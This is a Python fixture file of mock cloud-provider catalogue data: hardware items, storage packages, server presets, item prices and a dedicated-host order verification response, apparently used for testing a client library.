# pylint: skip-file HARDWARE_ITEMS = [ {'attributes': [], 'capacity': '999', 'description': 'Unknown', 'itemCategory': {'categoryCode': 'unknown', 'id': 325}, 'keyName': 'UNKNOWN', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 1245172, "locationGroupId": '', 'itemId': 935954, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [], 'capacity': '64', 'description': '1 IPv6 Address', 'itemCategory': {'categoryCode': 'pri_ipv6_addresses', 'id': 325}, 'keyName': '1_IPV6_ADDRESS', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 17129, "locationGroupId": '', 'itemId': 4097, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [], 'capacity': '10', 'description': '10 Mbps Public & Private Network Uplinks', 'itemCategory': {'categoryCode': 'port_speed', 'id': 26}, 'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 272, "locationGroupId": '', 'itemId': 186, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 5}]}, {'attributes': [], 'capacity': '0', 'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)', 'itemCategory': {'categoryCode': 'os', 'id': 12}, 'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 37650, "locationGroupId": '', 'itemId': 4702, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 9}], 'softwareDescription': {'id': 1362, 'longDescription': 'Ubuntu / 14.04-64', 'referenceCode': 'UBUNTU_14_64'}}, {'attributes': [], 'capacity': '1', 'description': '1 IP Address', 
'itemCategory': {'categoryCode': 'pri_ip_addresses', 'id': 13}, 'keyName': '1_IP_ADDRESS', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 21, "locationGroupId": '', 'itemId': 15, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [{'attributeTypeKeyName': 'RECLAIM_BYPASS', 'id': 1014}], 'description': 'Unlimited SSL VPN Users', 'itemCategory': {'categoryCode': 'vpn_management', 'id': 31}, 'keyName': 'SSL_VPN_USERS_1_PPTP_VPN_USER_PER_ACCOUNT', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 420, "locationGroupId": '', 'itemId': 309, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [], 'description': 'Reboot / KVM over IP', 'itemCategory': {'categoryCode': 'remote_management', 'id': 46}, 'keyName': 'REBOOT_KVM_OVER_IP', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 906, "locationGroupId": '', 'itemId': 504, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0}]}, {'attributes': [], 'capacity': '0', 'description': '0 GB Bandwidth', 'itemCategory': {'categoryCode': 'bandwidth', 'id': 10}, 'keyName': 'BANDWIDTH_0_GB', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'id': 22505, "locationGroupId": '', 'itemId': 4481, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 98}]}, {'attributes': [], 'capacity': '0', 'description': '0 GB Bandwidth', 'itemCategory': {'categoryCode': 'bandwidth', 'id': 10}, 'keyName': 'BANDWIDTH_0_GB_2', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 1800, "locationGroupId": '', 'itemId': 439, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': 
'0', 'quantity': '', 'setupFee': '0', 'sort': 99}]}] ENTERPRISE_PACKAGE = { 'categories': [ {'categoryCode': 'storage_service_enterprise'} ], 'id': 240, 'name': 'Endurance', 'items': [ { 'capacity': '0', 'itemCategory': {'categoryCode': 'storage_service_enterprise'}, 'keyName': 'CODENAME_PRIME_STORAGE_SERVICE', 'prices': [ { 'categories': [ {'categoryCode': 'storage_service_enterprise'} ], 'id': 45058, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': {'categoryCode': 'storage_file'}, 'keyName': 'FILE_STORAGE_2', 'prices': [ { 'categories': [ {'categoryCode': 'storage_file'} ], 'id': 45108, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': {'categoryCode': 'storage_block'}, 'keyName': 'BLOCK_STORAGE_2', 'prices': [ { 'categories': [ {'categoryCode': 'storage_block'} ], 'id': 45098, 'locationGroupId': '' } ] }, { 'capacity': '10', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '10_GB_STORAGE_SPACE', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 46160, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '300', 'capacityRestrictionMinimum': '300', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 46170, 'locationGroupId': '' } ] }, { 'capacity': '20', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 45860, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_replication'} ], 
'id': 46659, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'id': 45128, 'locationGroupId': '' } ] }, { 'capacity': '1000', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE', 'prices': [ { 'capacityRestrictionMaximum': '300', 'capacityRestrictionMinimum': '300', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_replication'} ], 'id': 46789, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '300', 'capacityRestrictionMinimum': '300', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'id': 45318, 'locationGroupId': '' } ] }, { 'attributes': [ {'value': '300'} ], 'capacity': '300', 'itemCategory': {'categoryCode': 'storage_tier_level'}, 'keyName': 'WRITEHEAVY_TIER', 'prices': [ { 'categories': [ {'categoryCode': 'storage_tier_level'} ], 'id': 45088, 'locationGroupId': '' } ] }, { 'attributes': [ {'value': '200'} ], 'capacity': '200', 'itemCategory': {'categoryCode': 'storage_tier_level'}, 'keyName': 'READHEAVY_TIER', 'prices': [ { 'categories': [ {'categoryCode': 'storage_tier_level'} ], 'id': 45078, 'locationGroupId': '' } ] } ] } PERFORMANCE_PACKAGE = { 'categories': [ {'categoryCode': 'performance_storage_iscsi'}, {'categoryCode': 'performance_storage_nfs'} ], 'id': 222, 'name': 'Performance', 'items': [ { 'capacity': '0', 'itemCategory': {'categoryCode': 'performance_storage_iscsi'}, 'keyName': 'BLOCK_STORAGE_PERFORMANCE_ISCSI', 'prices': [ { 'categories': [ {'categoryCode': 'performance_storage_iscsi'} ], 'id': 40672, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': {'categoryCode': 'performance_storage_nfs'}, 'keyName': 'FILE_STORAGE_PERFORMANCE_NFS', 'prices': [ { 'categories': [ {'categoryCode': 
'performance_storage_nfs'} ], 'id': 40662, 'locationGroupId': '' } ] }, { 'capacity': '20', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE', 'prices': [ { 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'id': 40682, 'locationGroupId': '' } ] }, { 'capacity': '1000', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE', 'prices': [ { 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'id': 40742, 'locationGroupId': '' } ] }, { 'capacity': '800', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'keyName': '800_IOPS_4', 'prices': [ { 'capacityRestrictionMaximum': '1000', 'capacityRestrictionMinimum': '100', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 41562, 'locationGroupId': '' } ] }, { 'capacity': '1000', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'keyName': '1000_IOPS', 'prices': [ { 'capacityRestrictionMaximum': '20', 'capacityRestrictionMinimum': '20', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 40882, 'locationGroupId': '' } ] } ] } SAAS_PACKAGE = { 'categories': [ {'categoryCode': 'storage_as_a_service'} ], 'id': 759, 'name': 'Storage As A Service (StaaS)', 'items': [ { 'capacity': '0', 'keyName': '', 'prices': [ { 'id': 189433, 'categories': [ {'categoryCode': 'storage_as_a_service'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'keyName': '', 'prices': [ { 'categories': [ {'categoryCode': 'storage_block'} ], 'id': 189443, 'locationGroupId': '' } ] }, { 'capacity': '0', 'keyName': '', 'prices': [ { 'categories': [ {'categoryCode': 'storage_file'} ], 'id': 189453, 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '999', 'capacityMinimum': '500', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': 
'500_999_GBS', 'prices': [ { 'id': 189993, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '1999', 'capacityMinimum': '1000', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '1000_1999_GBS', 'prices': [ { 'id': 190113, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '12000', 'capacityMinimum': '1', 'keyName': 'STORAGE_SPACE_FOR_2_IOPS_PER_GB', 'prices': [ { 'id': 193433, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '12000', 'capacityMinimum': '1', 'keyName': 'STORAGE_SPACE_FOR_4_IOPS_PER_GB', 'prices': [ { 'id': 194763, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '10000', 'capacityMinimum': '100', 'keyName': '', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'prices': [ { 'capacityRestrictionMaximum': '999', 'capacityRestrictionMinimum': '500', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 190053, 'locationGroupId': '' } ] }, { 'capacity': '0', 'capacityMaximum': '20000', 'capacityMinimum': '100', 'keyName': '', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'prices': [ { 'capacityRestrictionMaximum': '1999', 'capacityRestrictionMinimum': '1000', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 190173, 'locationGroupId': '' } ] }, { 'capacity': '200', 'itemCategory': {'categoryCode': 'storage_tier_level'}, 'keyName': '', 'prices': [ { 'id': 193373, 'categories': [ {'categoryCode': 'storage_tier_level'} ], 'locationGroupId': '' } ] }, { 'capacity': '300', 'itemCategory': {'categoryCode': 'storage_tier_level'}, 'keyName': '', 'prices': [ { 'id': 
194703, 'categories': [ {'categoryCode': 'storage_tier_level'} ], 'locationGroupId': '' } ] }, { 'capacity': '10', 'keyName': '', 'prices': [ { 'capacityRestrictionMaximum': '48000', 'capacityRestrictionMinimum': '100', 'capacityRestrictionType': 'IOPS', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 191193, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 193613, 'locationGroupId': '' }, { 'capacityRestrictionMaximum': '300', 'capacityRestrictionMinimum': '300', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 194943, 'locationGroupId': ''}] }, { 'capacity': '20', 'keyName': '', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 193853, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': { 'categoryCode': 'performance_storage_replication' }, 'keyName': 'REPLICATION_FOR_IOPSBASED_PERFORMANCE', 'prices': [ { 'capacityRestrictionMaximum': '48000', 'capacityRestrictionMinimum': '1', 'capacityRestrictionType': 'IOPS', 'categories': [ {'categoryCode': 'performance_storage_replication'} ], 'id': 192033, 'locationGroupId': '' } ] }, { 'capacity': '0', 'itemCategory': { 'categoryCode': 'performance_storage_replication' }, 'keyName': 'REPLICATION_FOR_TIERBASED_PERFORMANCE', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'performance_storage_replication'} ], 'id': 194693, 'locationGroupId': '' } ] } ] } SAAS_REST_PACKAGE = { 'categories': [ {'categoryCode': 'storage_as_a_service'} ], 'id': 759, 'name': 'Storage As A Service (StaaS)', 
'items': [ { 'capacity': '0', 'keyName': '', 'prices': [ { 'id': 189433, 'categories': [ {'categoryCode': 'storage_as_a_service'} ], 'locationGroupId': None } ] }, { 'capacity': '20', 'keyName': '', 'prices': [ { 'capacityRestrictionMaximum': '200', 'capacityRestrictionMinimum': '200', 'capacityRestrictionType': 'STORAGE_TIER_LEVEL', 'categories': [ {'categoryCode': 'storage_snapshot_space'} ], 'id': 193853, 'locationGroupId': None } ] }, { 'capacity': '0', 'capacityMaximum': '1999', 'capacityMinimum': '1000', 'itemCategory': {'categoryCode': 'performance_storage_space'}, 'keyName': '1000_1999_GBS', 'prices': [ { 'id': 190113, 'categories': [ {'categoryCode': 'performance_storage_space'} ], 'locationGroupId': None } ] }, { 'capacity': '0', 'capacityMaximum': '20000', 'capacityMinimum': '100', 'keyName': '', 'itemCategory': {'categoryCode': 'performance_storage_iops'}, 'prices': [ { 'capacityRestrictionMaximum': '1999', 'capacityRestrictionMinimum': '1000', 'capacityRestrictionType': 'STORAGE_SPACE', 'categories': [ {'categoryCode': 'performance_storage_iops'} ], 'id': 190173, 'locationGroupId': None } ] }, { 'capacity': '0', 'keyName': '', 'prices': [ { 'categories': [ {'categoryCode': 'storage_file'} ], 'id': 189453, 'locationGroupId': None } ] } ] } activePreset1 = { 'description': 'Single Xeon 1270, 8GB Ram, 2x1TB SATA disks, Non-RAID', 'id': 64, 'isActive': '1', 'keyName': 'S1270_8GB_2X1TBSATA_NORAID', 'name': 'S1270 8GB 2X1TBSATA NORAID', 'packageId': 200, 'prices': [ { "hourlyRecurringFee": "1.18", "id": 165711, "locationGroupId": '', "recurringFee": "780", } ] } activePreset2 = { 'description': 'Dual Xeon Gold, 384GB Ram, 4x960GB SSD, RAID 10', 'id': 65, 'isActive': '1', 'keyName': 'DGOLD_6140_384GB_4X960GB_SSD_SED_RAID_10', 'name': 'DGOLD 6140 384GB 4X960GB SSD SED RAID 10', 'packageId': 200, 'prices': [ { "hourlyRecurringFee": "1.18", "id": 165711, "locationGroupId": '', "recurringFee": "780", } ] } getAllObjects = [{ 'activePresets': [activePreset1], 
'accountRestrictedActivePresets': [activePreset2], 'description': 'Bare Metal Server', 'firstOrderStepId': 1, 'id': 200, 'isActive': 1, 'items': HARDWARE_ITEMS, 'name': 'Bare Metal Server', 'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.', 'keyname': 'WASHINGTON_DC', 'location': {'location': {'id': 37473, 'longName': 'Washington 1', 'name': 'wdc01'}}, 'sortOrder': 10}], 'subDescription': 'Bare Metal Server', 'unitSize': 1, "itemPrices": [ { "hourlyRecurringFee": ".027", "id": 205911, "laborFee": "0", "locationGroupId": 505, "capacityRestrictionMaximum": "40", "capacityRestrictionMinimum": "40", "capacityRestrictionType": "CORE", "item": { "capacity": "0", "description": "Load Balancer Uptime", "id": 10785, "keyName": "LOAD_BALANCER_UPTIME", } }, { "hourlyRecurringFee": "0", "id": 199467, "laborFee": "0", "locationGroupId": '', "recurringFee": "0", "item": { "capacity": "0", "description": "Load Balancer Bandwidth", "id": 10051, "keyName": "LOAD_BALANCER_BANDWIDTH", } }, { "hourlyRecurringFee": ".028", "id": 205913, "laborFee": "0", "locationGroupId": 507, "item": { "capacity": "0", "description": "Load Balancer Uptime", "id": 10785, "keyName": "LOAD_BALANCER_UPTIME", } }] }] getItems = [ { 'id': 1234, 'keyName': 'KeyName01', 'capacity': '1000', 'description': 'Public & Private Networks', 'itemCategory': {'categoryCode': 'Uplink Port Speeds'}, 'softwareDescription': { 'id': 1228, 'longDescription': 'Redhat EL 5.10-64', 'referenceCode': 'REDHAT_5_64' }, 'prices': [{'id': 1122, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10, 'categories': [{'id': 26, 'name': 'Uplink Port Speeds', 'categoryCode': 'port_speed'}]}], }, { 'id': 2233, 'keyName': 'KeyName02', 'capacity': '1000', 'description': 'Public & Private Networks', 'itemCategory': {'categoryCode': 'Uplink Port Speeds'}, 'prices': [{'id': 4477, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10, 'categories': [{'id': 26, 'name': 'Uplink Port Speeds', 'categoryCode': 'port_speed'}]}], }, { 'id': 
1239, 'keyName': 'KeyName03', 'capacity': '2', 'description': 'RAM', 'itemCategory': {'categoryCode': 'RAM'}, 'prices': [{'id': 1133, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 3, 'name': 'RAM', 'categoryCode': 'ram'}]}], }, { 'id': 1240, 'keyName': 'KeyName014', 'capacity': '4', 'units': 'PRIVATE_CORE', 'description': 'Computing Instance (Dedicated)', 'itemCategory': {'categoryCode': 'Computing Instance'}, 'prices': [{'id': 1007, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 80, 'name': 'Computing Instance', 'categoryCode': 'guest_core'}]}], }, { 'id': 1250, 'keyName': 'KeyName015', 'capacity': '4', 'units': 'CORE', 'description': 'Computing Instance', 'itemCategory': {'categoryCode': 'Computing Instance'}, 'prices': [{'id': 1144, 'locationGroupId': None, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10, 'categories': [{'id': 80, 'name': 'Computing Instance', 'categoryCode': 'guest_core'}]}], }, { 'id': 112233, 'keyName': 'KeyName016', 'capacity': '55', 'units': 'CORE', 'description': 'Computing Instance', 'itemCategory': {'categoryCode': 'Computing Instance'}, 'prices': [{'id': 332211, 'locationGroupId': 1, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 80, 'name': 'Computing Instance', 'categoryCode': 'guest_core'}]}], }, { 'id': 4439, 'keyName': 'KeyName017', 'capacity': '1', 'description': '1 GB iSCSI Storage', 'itemCategory': {'categoryCode': 'iscsi'}, 'prices': [{'id': 2222, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, { 'id': 1121, 'keyName': 'KeyName081', 'capacity': '20', 'description': '20 GB iSCSI snapshot', 'itemCategory': {'categoryCode': 'iscsi_snapshot_space'}, 'prices': [{'id': 2014, 'hourlyRecurringFee': 0.10}], }, { 'id': 4440, 'keyName': 'KeyName019', 'capacity': '4', 'description': '4 Portable Public IP Addresses', 'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'}, 'prices': [{'id': 4444, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, { 'id': 
8880, 'keyName': 'KeyName0199', 'capacity': '8', 'description': '8 Portable Public IP Addresses', 'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'}, 'prices': [{'id': 8888, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, { 'id': 44400, 'keyName': 'KeyName0155', 'capacity': '4', 'description': '4 Portable Private IP Addresses', 'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'}, 'prices': [{'id': 44441, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, { 'id': 88800, 'keyName': 'KeyName0144', 'capacity': '8', 'description': '8 Portable Private IP Addresses', 'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'}, 'prices': [{'id': 88881, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}], }, { 'id': 10, 'keyName': 'KeyName0341', 'capacity': '0', 'description': 'Global IPv4', 'itemCategory': {'categoryCode': 'global_ipv4'}, 'prices': [{'id': 11, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}], }, { 'id': 66464, 'keyName': '1_IPV6_ADDRESS', 'capacity': '64', 'description': '/64 Block Portable Public IPv6 Addresses', 'itemCategory': {'categoryCode': 'static_ipv6_addresses'}, 'prices': [{'id': 664641, 'hourlyRecurringFee': '0', 'locationGroupId': '', 'recurringFee': '0'}], }, { 'id': 610, 'keyName': 'KeyName031', 'capacity': '0', 'description': 'Global IPv6', 'itemCategory': {'categoryCode': 'global_ipv6'}, 'prices': [{'id': 611, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}], }, {'attributes': [], 'capacity': '0', 'description': '0 GB Bandwidth', 'itemCategory': {'categoryCode': 'bandwidth', 'id': 10}, 'keyName': 'BANDWIDTH_0_GB_2', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 1800, "locationGroupId": '', 'itemId': 439, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'setupFee': '0', 'sort': 99}]}, {'attributes': [], 'capacity': '10', 'description': '10 Mbps Public & Private Network Uplinks', 'itemCategory': {'categoryCode': 'port_speed', 'id': 26}, 
'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0', 'id': 272, "locationGroupId": '', 'itemId': 186, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 5}]}, {'attributes': [], 'capacity': '0', 'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)', 'itemCategory': {'categoryCode': 'os', 'id': 12}, 'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT', 'prices': [{'accountRestrictions': [], 'currentPriceFlag': '', 'hourlyRecurringFee': '0.10', 'id': 37650, "locationGroupId": '', 'itemId': 4702, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'quantity': '', 'recurringFee': '0.1', 'setupFee': '0.1', 'sort': 9}], 'softwareDescription': {'id': 1362, 'longDescription': 'Ubuntu / 14.04-64', 'referenceCode': 'UBUNTU_14_64'}} ] getItemPricesISCSI = [ { 'currentPriceFlag': '', 'id': 2152, 'item': { 'capacity': '1', 'description': '1 GB iSCSI SAN Storage', 'id': 1111, 'softwareDescriptionId': '', 'units': 'GB', 'upgradeItemId': 547}, 'itemId': 1111, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'packageReferences': [{'id': 46626, 'itemPriceId': 2152, 'packageId': 0}], 'quantity': '', 'recurringFee': '.35', 'setupFee': '0', 'sort': 0 }, { 'currentPriceFlag': '', 'id': 22501, 'item': {'capacity': '1', 'description': '1 GB iSCSI SAN Storage', 'id': 1111, 'softwareDescriptionId': '', 'units': 'GB', 'upgradeItemId': 547}, 'itemId': 1111, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'packageReferences': [{ 'id': 252983, 'itemPriceId': 22501, 'packageId': 0 }], 'quantity': '', 'recurringFee': '0', 'setupFee': '0', 'sort': 0 }, { 'currentPriceFlag': '', 'id': 22441, 'item': { 'capacity': '1', 'description': '1 GB iSCSI SAN Storage', 'id': 1111, 'softwareDescriptionId': '', 'units': 'GB', 'upgradeItemId': 547 }, 'itemId': 1111, 'laborFee': '0', 'onSaleFlag': '', 'oneTimeFee': '0', 'packageReferences': 
[{'id': 250326, 'itemPriceId': 22441, 'packageId': 0}], 'quantity': '', 'recurringFee': '15', 'setupFee': '0', 'sort': 0 }] getItemsVS = [ { 'id': 1234, 'keyName': 'KeyName01', 'capacity': '1000', 'description': 'Public & Private Networks', 'itemCategory': {'categoryCode': 'Uplink Port Speeds'}, 'softwareDescription': { 'id': 1228, 'longDescription': 'Redhat EL 5.10-64', 'referenceCode': 'REDHAT_5_64' }, 'prices': [{'id': 1122, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 26, 'name': 'Uplink Port Speeds', 'categoryCode': 'port_speed'}]}], }, { 'id': 2233, 'keyName': 'KeyName02', 'capacity': '1000', 'description': 'Public & Private Networks', 'itemCategory': {'categoryCode': 'Uplink Port Speeds'}, 'prices': [{'id': 4477, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 26, 'name': 'Uplink Port Speeds', 'categoryCode': 'port_speed'}]}], }, { 'id': 1239, 'keyName': 'KeyName03', 'capacity': '2', 'description': 'RAM', 'itemCategory': {'categoryCode': 'RAM'}, 'prices': [{'id': 1133, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0, 'categories': [{'id': 3, 'name': 'RAM', 'categoryCode': 'ram'}]}], } ] verifyOrderDH = { 'preTaxSetup': '0', 'storageGroups': [], 'postTaxRecurring': '3.164', 'billingOrderItemId': '', 'presetId': '', 'hardware': [ { 'domain': 't.com', 'hostname': 't', 'bareMetalInstanceFlag': '', 'hardwareStatusId': '', 'primaryBackendNetworkComponent': { 'router': { 'id': 51218 }, 'networkVlanId': '' }, 'accountId': '' } ], 'prices': [ { 'itemId': 10195, 'setupFee': '0', 'recurringFee': '0', 'hourlyRecurringFee': '3.164', 'oneTimeFee': '0', 'id': 200269, 'item': { 'thirdPartyPolicyAssignments': [], 'capacity': '56', 'description': '56 Cores X 242 RAM X 1.2 TB', 'bundle': [ { 'category': { 'categoryCode': 'dedicated_host_ram', 'id': 850, 'name': 'Dedicated Host RAM' }, 'itemPriceId': 200301, 'itemPrice': { 'itemId': 10199, 'setupFee': '0', 'recurringFee': '0', 'hourlyRecurringFee': '0', 'oneTimeFee': '0', 'id': 
200301, 'laborFee': '0' }, 'bundleItemId': 10195, 'bundleItem': { 'units': 'CORE', 'keyName': '56_CORES_X_242_RAM_X_1_4_TB', 'capacity': '56', 'description': '56 Cores X 242 RAM X 1.2 TB', 'id': 10195 }, 'id': 41763 }, { 'category': { 'categoryCode': 'dedicated_host_disk', 'id': 851, 'name': 'Dedicated Host Disk' }, 'itemPriceId': 200299, 'itemPrice': { 'itemId': 10197, 'setupFee': '0', 'recurringFee': '0', 'hourlyRecurringFee': '0', 'oneTimeFee': '0', 'id': 200299, 'laborFee': '0' }, 'bundleItemId': 10195, 'bundleItem': { 'units': 'CORE', 'keyName': '56_CORES_X_242_RAM_X_1_4_TB', 'capacity': '56', 'description': '56 Cores X 242 RAM X 1.2 TB', 'id': 10195 }, 'id': 41761 } ], 'keyName': '56_CORES_X_242_RAM_X_1_4_TB', 'units': 'CORE', 'id': 10195 }, 'laborFee': '0', 'categories': [ { 'categoryCode': 'dedicated_virtual_hosts', 'id': 848, 'name': 'Dedicated Host' } ] } ], 'sendQuoteEmailFlag': '', 'packageId': 813, 'useHourlyPricing': True, 'preTaxRecurringMonthly': '0', 'message': '', 'preTaxRecurring': '3.164', 'primaryDiskPartitionId': '', 'locationObject': { 'id': 138124, 'name': 'dal05', 'longName': 'Dallas 5' }, 'taxCompletedFlag': False, 'isManagedOrder': '', 'imageTemplateId': '', 'postTaxRecurringMonthly': '0', 'resourceGroupTemplateId': '', 'postTaxSetup': '0', 'sshKeys': [], 'location': '138124', 'stepId': '', 'proratedInitialCharge': '0', 'totalRecurringTax': '0', 'paymentType': '', 'resourceGroupId': '', 'sourceVirtualGuestId': '', 'bigDataOrderFlag': False, 'extendedHardwareTesting': '', 'preTaxRecurringHourly': '3.164', 'postTaxRecurringHourly': '3.164', 'currencyShortName': 'USD', 'containerSplHash': '000000003699c54000007f38ef8b0102', 